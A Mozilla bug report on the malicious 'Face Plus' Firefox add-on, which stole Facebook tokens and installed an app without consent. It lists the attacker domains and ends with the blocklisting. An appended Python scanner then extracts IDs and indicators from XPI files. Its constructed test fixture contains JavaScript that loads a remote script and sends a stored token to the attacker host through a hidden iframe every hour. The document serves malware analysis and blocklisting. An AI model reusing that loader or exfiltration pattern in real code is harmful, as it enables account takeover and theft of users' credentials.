Bug 743012 - Malicious "Face Plus" add-on
Status: RESOLVED FIXED
Product: Toolkit
Classification: Components
Component: Blocklisting
Version: unspecified
Platform: All All
Importance: -- normal
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-04-05 15:12 PDT by MarkH
Modified: 2016-03-07 15:30 PST

Attachments
20120406_faceplus.zip (490.38 KB, application/octet-stream), 2012-04-05 15:12 PDT, MarkH

Description MarkH 2012-04-05 15:12:22 PDT
Created attachment 612702
20120406_faceplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded from http://install.faceplus.biz/face-plus.xpi



Actual results:

NOTE: Attempting to access any of the JS directly, without a Facebook
referer, gets you bounced to
http://userscripts.org/scripts/source/61761.user.js, which is the
SocialFixer plugin JS.

adobeflashplayer.js:

JS in add-on.
Injects http://cdn.faceplus.biz/faceplus.js.



faceplus.js:

URLs included at start of script:

    var reklam = "http://ads.faceplus.biz/reklam.html?&s&";
    var bokcurl = 'http://faceklenti10.zapto.org/yon.php';
    linek = new Array(
        "http://begeni.zapto.org/yon.php",
        "http://faceplus2.mm.am/yon.php",
        "http://faceplus3.mm.am/yon.php",
        "http://faceplus4.mm.am/yon.php",
        "http://faceplus5.mm.am/yon.php",
        "http://faceplus.crabdance.com/yon.php",
        "http://faceplus.uk.to/yon.php",
        "http://faceplus.ignorelist.com/",
        "http://faceplus.strangled.net/",
        "http://faceplus.twilightparadox.com/"
    );


Injects http://graph.facebook.com/<uid>?callback=cins, to get your public
profile data

Injects http://cdn.faceplus.biz/graph.js or http://faceplus.biz/z.js

Tries to inject
http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/04/03/16/1333458695713783.jpg
as a script; AWS returns an error.


graph.js:

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Injects
http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/03/28/19/1332953948955831.jpg
as the source of a script tag.

Uses local storage to maintain state

z.js:

Can do the following, based on configuration:
like a page
add a subscription
send a friend request
report users as abusive

Auto installs FB App 338319369521728, giving it full access to the user's
account

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Uses local storage to maintain state



Expected results:

It should not steal your tokens and send them to a third party server or install a Facebook app without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-04-09 10:02:50 PDT
ID: {8f42fb8b-b6f6-45de-81c0-d6d39f54f971}
Comment 2 Jorge Villalobos [:jorgev] 2012-04-09 10:04:50 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i82
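The triage the report walks through (unpack the .xpi, read the add-on ID that comment 1 records for the blocklist entry, pull the external hosts and the injection patterns out of every bundled script) written out as an added Python example. This is not code from the bug, from the reporter or from Mozilla's blocklist tooling; the XPI it scans is a constructed stand-in that only carries the indicators the report names (the em:id from comment 1, a remote script load from cdn.faceplus.biz, an hourly hidden-iframe post to begeni.zapto.org), not the real attachment. The host list and the source patterns are the ones named in the description; treat them as assumptions to extend, not as a complete signature.

```python
import io
import re
import zipfile
from urllib.parse import urlparse

# Hosts named in the bug report; any other host found is reported as unknown/external
KNOWN_BAD_HOSTS = {
    "install.faceplus.biz", "cdn.faceplus.biz", "faceplus.biz", "ads.faceplus.biz",
    "begeni.zapto.org", "faceklenti10.zapto.org",
}

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
# install.rdf carries the add-on ID as <em:id>{uuid}</em:id>
ID_RE = re.compile(r"<em:id>\s*(\{[0-9a-fA-F-]{36}\})\s*</em:id>")

# Source constructs the report attributes to the add-on: remote <script> injection,
# a hidden iframe used for exfiltration, Graph API calls, localStorage state, a timer
PATTERNS = {
    "remote_script": re.compile(r"""createElement\(\s*["']script["']\s*\)"""),
    "hidden_iframe": re.compile(r"""createElement\(\s*["']iframe["']\s*\)"""),
    "graph_api": re.compile(r"graph\.facebook\.com"),
    "local_storage": re.compile(r"\blocalStorage\b"),
    "timer": re.compile(r"\bsetInterval\s*\("),
}


def scan_xpi(data: bytes) -> dict:
    """Return the add-on ID, per-script pattern hits, and external hosts found in an XPI."""
    report = {"id": None, "scripts": {}, "external_hosts": set(), "known_bad": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower() == "install.rdf":
                m = ID_RE.search(zf.read(name).decode("utf-8", "replace"))
                if m:
                    report["id"] = m.group(1)
            elif name.lower().endswith(".js"):
                src = zf.read(name).decode("utf-8", "replace")
                report["scripts"][name] = sorted(k for k, rx in PATTERNS.items() if rx.search(src))
                for url in URL_RE.findall(src):
                    host = urlparse(url).hostname
                    if host:
                        report["external_hosts"].add(host)
                        if host in KNOWN_BAD_HOSTS:
                            report["known_bad"].add(host)
    return report


def build_sample_xpi() -> bytes:
    """Constructed test fixture, not the real attachment: a manifest with the ID from
    comment 1 and a loader that contains only the indicators the report describes."""
    install_rdf = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>{8f42fb8b-b6f6-45de-81c0-d6d39f54f971}</em:id>
    <em:name>Face Plus</em:name>
  </Description>
</RDF>
"""
    loader_js = """// constructed sample for scanner testing, not the add-on's own code
var s = document.createElement("script");
s.src = "http://cdn.faceplus.biz/faceplus.js";
document.head.appendChild(s);
setInterval(function () {
  var f = document.createElement("iframe");
  f.style.display = "none";
  f.src = "http://begeni.zapto.org/pom.html?" + localStorage.getItem("t");
  document.body.appendChild(f);
}, 3600000);
"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("install.rdf", install_rdf)
        zf.writestr("content/adobeflashplayer.js", loader_js)
    return buf.getvalue()


if __name__ == "__main__":
    r = scan_xpi(build_sample_xpi())
    print("add-on ID:", r["id"])
    for script, hits in r["scripts"].items():
        print(script, "->", ", ".join(hits) or "no hits")
    print("external hosts:", sorted(r["external_hosts"]))
    print("known bad hosts:", sorted(r["known_bad"]))
```

Run it against a real sample with `scan_xpi(open("face-plus.xpi", "rb").read())`; the ID it extracts is the value a blocklist entry keys on, and any host outside the known list is a lead to pivot on, not a verdict. Scripts that fetch further stages at runtime (faceplus.js and graph.js here are loaded from the attacker's CDN, not shipped in the XPI) will only show the loader's indicators, so static scanning of the package is the first pass, not the whole analysis.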
